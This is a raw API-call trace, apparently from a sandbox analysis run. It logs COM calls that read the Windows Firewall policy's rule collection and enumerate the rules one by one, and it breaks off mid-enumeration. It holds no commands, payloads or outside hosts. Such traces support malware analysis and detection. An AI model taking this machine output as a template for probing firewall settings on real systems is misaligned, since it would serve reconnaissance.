[0228.094] IUnknown:AddRef (This=0x187ce98) returned 0x3 [0228.094] IUnknown:Release (This=0x187ce98) returned 0x2 [0228.094] IUnknown:Release (This=0x187ce98) returned 0x1 [0228.094] IUnknown:AddRef (This=0x187ce98) returned 0x2 [0228.094] IUnknown:QueryInterface (in: This=0x187ce98, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea58 | out: ppvObject=0x25ea58*=0x0) returned 0x80004002 [0228.109] IDispatch:GetIDsOfNames (in: This=0x187ce98, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x25ea5c*="rules", cNames=0x1, lcid=0x409, rgDispId=0x25ea74 | out: rgDispId=0x25ea74*=7) returned 0x0 [0228.146] IUnknown:AddRef (This=0x187ce98) returned 0x2 [0228.146] IUnknown:QueryInterface (in: This=0x187ce98, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea60 | out: ppvObject=0x25ea60*=0x0) returned 0x80004002 [0228.146] IDispatch:Invoke (in: This=0x187ce98, dispIdMember=7, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x25ea2c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2a3d38, pExcepInfo=0x25ea08, puArgErr=0x25ea4c | out: pDispParams=0x25ea2c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2a3d38*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x187cec0, varVal2=0x0), pExcepInfo=0x25ea08*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x25ea4c*=0x187ce98) returned 0x0 [0228.146] IUnknown:Release (This=0x187ce98) returned 0x1 [0228.154] IUnknown:QueryInterface (in: This=0x187cec0, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25e950 | out: ppvObject=0x25e950*=0x0) returned 0x80004002 [0228.154] IUnknown:AddRef (This=0x187cec0) returned 0x3 [0228.154] IUnknown:AddRef (This=0x187cec0) returned 0x3 [0228.155] IUnknown:QueryInterface (in: This=0x187cec0, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea84 | out: ppvObject=0x25ea84*=0x0) returned 0x80004002 [0228.155] IDispatch:Invoke (in: This=0x187cec0, dispIdMember=-4, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x25ea50*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2a3d38, pExcepInfo=0x25ea2c, puArgErr=0x25ea70 | out: pDispParams=0x25ea50*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2a3d38*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1876f60, varVal2=0x0), pExcepInfo=0x25ea2c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x25ea70*=0x187cec0) returned 0x0 [0228.272] IUnknown:Release (This=0x187cec0) returned 0x2 [0228.272] IUnknown:QueryInterface (in: This=0x1876f60, riid=0x6c4c4140*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25e974 | out: ppvObject=0x25e974*=0x0) returned 0x80004002 [0228.273] IUnknown:QueryInterface (in: This=0x1876f60, riid=0x6c4d09f0*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25eb34 | out: ppvObject=0x25eb34*=0x1876f60) returned 0x0 [0228.273] IUnknown:Release (This=0x1876f60) returned 0x1 [0228.273] IUnknown:AddRef (This=0x187cec0) returned 0x3 [0228.273] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2a4370, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.310] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.311] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.311] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.312] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.312] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.312] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.313] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.313] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.313] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.314] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.314] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.314] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.314] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.315] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.315] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.315] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.316] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.316] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.316] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.317] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.317] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.317] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.318] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.318] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.318] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.319] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.319] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.319] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.319] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.320] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.320] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.320] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.321] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.321] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.321] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.322] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.322] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.322] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.322] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.323] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.323] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.323] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.324] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.325] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.325] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.326] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.326] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.326] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.327] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.327] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.327] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.328] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.328] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.328] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.329] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.329] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.329] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.330] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.330] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.330] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.330] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.331] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.331] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.331] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.332] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.332] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.332] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.333] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.333] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.333] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.333] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.334] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.334] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.334] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.335] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.335] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.335] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.336] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.336] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.336] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.336] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.337] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.337] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.337] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.338] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.338] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.338] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.339] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.339] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.339] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.340] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.341] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.341] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.341] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.341] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.342] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.342] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.342] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.343] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.343] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.343] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.344] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.344] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.344] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.345] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.345] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.345] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.346] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.346] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.346] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.346] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.347] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.347] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.347] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.348] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.348] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.348] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.349] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.349] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.349] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.349] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.350] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.350] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.350] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.351] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.351] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.351] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.352] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.352] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.352] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.352] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.353] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.353] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.353] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.354] 